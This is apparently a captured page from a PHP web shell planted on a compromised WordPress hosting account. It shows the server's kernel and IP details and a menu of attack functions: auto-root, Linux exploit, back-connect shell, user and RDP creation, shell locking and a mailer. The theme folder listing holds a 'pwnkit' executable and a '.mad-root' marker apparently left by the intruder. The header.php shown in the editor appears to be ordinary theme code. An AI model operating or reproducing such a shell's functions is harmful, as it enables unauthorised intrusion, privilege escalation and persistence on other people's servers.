Linux webm008.cluster106.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.106.20.8 | : 216.73.217.10
Cant Read [ /etc/named.conf ]
5.6.40
associattd
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
associattd /
www /
wp-content /
themes /
spacious /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
font-awesome
[ DIR ]
drwxr-xr-x
genericons
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
page-templates
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
1023
B
-rw-r--r--
archive.php
808
B
-rw-r--r--
comments.php
2.75
KB
-rw-r--r--
content-blog-full-content.php
954
B
-rw-r--r--
content-blog-image-large.php
1.54
KB
-rw-r--r--
content-blog-image-medium.php
1.62
KB
-rw-r--r--
content-page.php
1.44
KB
-rw-r--r--
content-single.php
1.55
KB
-rw-r--r--
content.php
1.86
KB
-rw-r--r--
footer.php
945
B
-rw-r--r--
functions.php
17.68
KB
-rw-r--r--
gulpfile.js
2.93
KB
-rw-r--r--
header.php
8.03
KB
-rw-r--r--
home.php
858
B
-rw-r--r--
index.php
795
B
-rw-r--r--
navigation.php
1.29
KB
-rw-r--r--
no-results.php
1022
B
-rw-r--r--
package-lock.json
297.23
KB
-rw-r--r--
page.php
897
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
17.77
KB
-rw-r--r--
screenshot.jpg
107.55
KB
-rw-r--r--
search.php
812
B
-rw-r--r--
searchform.php
478
B
-rw-r--r--
sidebar-footer.php
2.77
KB
-rw-r--r--
sidebar-left.php
1.05
KB
-rw-r--r--
sidebar.php
1.23
KB
-rw-r--r--
single.php
1.64
KB
-rw-r--r--
style-editor-block.css
11.24
KB
-rw-r--r--
style-rtl.css
71.77
KB
-rw-r--r--
style.css
68.2
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.php
<?php /** * Theme Header Section for our theme. * * Displays all of the <head> section and everything up till <div id="main" class="clearfix"> <div class="inner-wrap"> * * @package ThemeGrill * @subpackage Spacious * @since Spacious 1.0 */ ?><!DOCTYPE html> <!--[if IE 7]> <html class="ie ie7" <?php language_attributes(); ?>> <![endif]--> <!--[if IE 8]> <html class="ie ie8" <?php language_attributes(); ?>> <![endif]--> <!--[if !(IE 7) & !(IE 8)]><!--> <html <?php language_attributes(); ?>> <!--<![endif]--> <head> <meta charset="<?php bloginfo( 'charset' ); ?>" /> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11" /> <?php /** * This hook is important for wordpress plugins and other many things */ wp_head(); ?> </head> <body <?php body_class(); ?>> <?php /** * WordPress function to load custom scripts after body. * * Introduced in WordPress 5.2.0 * * @since Spacious 1.6.4 */ if ( function_exists( 'wp_body_open' ) ) { wp_body_open(); } ?> <?php do_action( 'before' ); ?> <div id="page" class="hfeed site"> <a class="skip-link screen-reader-text" href="#main"><?php esc_html_e( 'Skip to content', 'spacious' ); ?></a> <?php do_action( 'spacious_before_header' ); ?> <?php $spacious_header_display_type = spacious_options( 'spacious_header_display_type', 'one' ); if ( $spacious_header_display_type === 'one' ) { $header_class = 'spacious-header-display-one'; } elseif ( $spacious_header_display_type === 'four' ) { $header_class = 'spacious-header-display-four'; } ?> <header id="masthead" class="site-header clearfix <?php echo esc_attr( $header_class ); ?>"> <?php if ( spacious_options( 'spacious_activate_top_header_bar', 0 ) == 1 ) { ?> <div id="header-meta"> <div class="inner-wrap clearfix"> <?php if ( spacious_options( 'spacious_activate_social_links', 0 ) == 1 ) { spacious_social_links(); } ?> <div class="small-info-text"><?php spacious_header_info_text(); ?></div> <nav class="small-menu" class="clearfix"> <?php if ( has_nav_menu( 'header' ) ) { wp_nav_menu( array( 'theme_location' => 'header', 'depth' => -1 ) ); } ?> </nav> </div> </div> <?php } ?> <?php if ( 'above' === spacious_options( 'spacious_header_image_position', 'above' ) ) { spacious_render_header_image(); } ?> <div id="header-text-nav-container" class="<?php echo ( spacious_options( 'spacious_one_line_menu_setting', 0 ) == 1 ) ? 'menu-one-line' : ''; ?>"> <div class="inner-wrap" id="<?php echo esc_attr( $header_class ); ?>"> <div id="header-text-nav-wrap" class="clearfix"> <div id="header-left-section"> <?php if ( ( 'both' === spacious_options( 'spacious_show_header_logo_text', 'text_only' ) || 'logo_only' === spacious_options( 'spacious_show_header_logo_text', 'text_only' ) ) ) { ?> <div id="header-logo-image"> <?php if ( function_exists( 'the_custom_logo' ) && has_custom_logo( $blog_id = 0 ) ) { spacious_the_custom_logo(); } ?> </div><!-- #header-logo-image --> <?php } $screen_reader = ''; if ( ( 'logo_only' === spacious_options( 'spacious_show_header_logo_text', 'text_only' ) || 'none' === spacious_options( 'spacious_show_header_logo_text', 'text_only' ) ) ) { $screen_reader = 'screen-reader-text'; } ?> <div id="header-text" class="<?php echo $screen_reader; ?>"> <?php if ( is_front_page() || is_home() ) : ?> <h1 id="site-title"> <a href="<?php echo esc_url( home_url( '/' ) ); ?>" title="<?php echo esc_attr( get_bloginfo( 'name', 'display' ) ); ?>" rel="home"><?php bloginfo( 'name' ); ?></a> </h1> <?php else : ?> <h3 id="site-title"> <a href="<?php echo esc_url( home_url( '/' ) ); ?>" title="<?php echo esc_attr( get_bloginfo( 'name', 'display' ) ); ?>" rel="home"><?php bloginfo( 'name' ); ?></a> </h3> <?php endif; $description = get_bloginfo( 'description', 'display' ); if ( $description || is_customize_preview() ) : ?> <p id="site-description"><?php echo $description; ?></p> <?php endif; ?><!-- #site-description --> </div><!-- #header-text --> </div><!-- #header-left-section --> <div id="header-right-section"> <?php if ( is_active_sidebar( 'spacious_header_sidebar' ) ) { ?> <div id="header-right-sidebar" class="clearfix"> <?php // Calling the header sidebar if it exists. if ( ! dynamic_sidebar( 'spacious_header_sidebar' ) ): endif; ?> </div> <?php } ?> <?php if ( 'four' !== spacious_options( 'spacious_header_display_type', 'one' ) ) : ?> <div class="header-action"> <?php spacious_cart_icon(); if ( 1 === spacious_options( 'spacious_header_search_icon', 0 ) ) : ?> <div class="search-wrapper"> <div class="search"> <i class="fa fa-search"> </i> </div> <div class="header-search-form"> <?php get_search_form(); ?> </div> </div><!-- /.search-wrapper --> <?php endif; ?> </div> <?php endif; ?> <?php if ( ! ( 'four' === spacious_options( 'spacious_header_display_type', 'one' ) ) ) : spacious_main_nav(); endif; ?> </div><!-- #header-right-section --> </div><!-- #header-text-nav-wrap --> </div><!-- .inner-wrap --> <?php if ( 'four' === spacious_options( 'spacious_header_display_type', 'one' ) ) : ?> <div class="bottom-menu clearfix <?php echo spacious_options( 'spacious_header_button_setting' ) ? 'header-menu-button' : ''; ?>"> <div class="inner-wrap clearfix"> <?php spacious_main_nav(); ?> <div class="header-action"> <?php spacious_cart_icon(); if ( 1 === spacious_options( 'spacious_header_search_icon', 0 ) ) : ?> <div class="search-wrapper"> <div class="search"> <i class="fa fa-search"> </i> </div> <div class="header-search-form"> <?php get_search_form(); ?> </div> </div><!-- /.search-wrapper --> <?php endif; ?> </div> </div> </div> <?php endif; ?> </div><!-- #header-text-nav-container --> <?php if ( 'below' === spacious_options( 'spacious_header_image_position', 'above' ) ) { spacious_render_header_image(); } ?> <?php if ( spacious_options( 'spacious_activate_slider', '0' ) == '1' ) { if ( spacious_options( 'spacious_blog_slider', '0' ) != '1' ) { if ( is_home() || is_front_page() ) { spacious_featured_image_slider(); } } else { if ( is_front_page() ) { spacious_featured_image_slider(); } } } if ( ( '' != spacious_header_title() ) && ! ( is_front_page() ) && ( ! spacious_options( 'spacious_header_title_hide', 0 ) ) ) { if ( ! ( spacious_options( 'spacious_blog_slider', '0' ) != '1' && is_home() ) ) { ?> <div class="header-post-title-container clearfix"> <div class="inner-wrap"> <div class="post-title-wrapper"> <?php if ( '' != spacious_header_title() ) { ?> <?php if ( is_home() ) : ?> <h2 class="header-post-title-class"><?php echo spacious_header_title(); ?></h2> <?php else : ?> <h1 class="header-post-title-class"><?php echo spacious_header_title(); ?></h1> <?php endif; ?> <?php } ?> </div> <?php if ( function_exists( 'spacious_breadcrumb' ) ) { spacious_breadcrumb(); } ?> </div> </div> <?php } } ?> </header> <?php do_action( 'spacious_after_header' ); ?> <?php do_action( 'spacious_before_main' ); ?> <div id="main" class="clearfix"> <div class="inner-wrap">
Close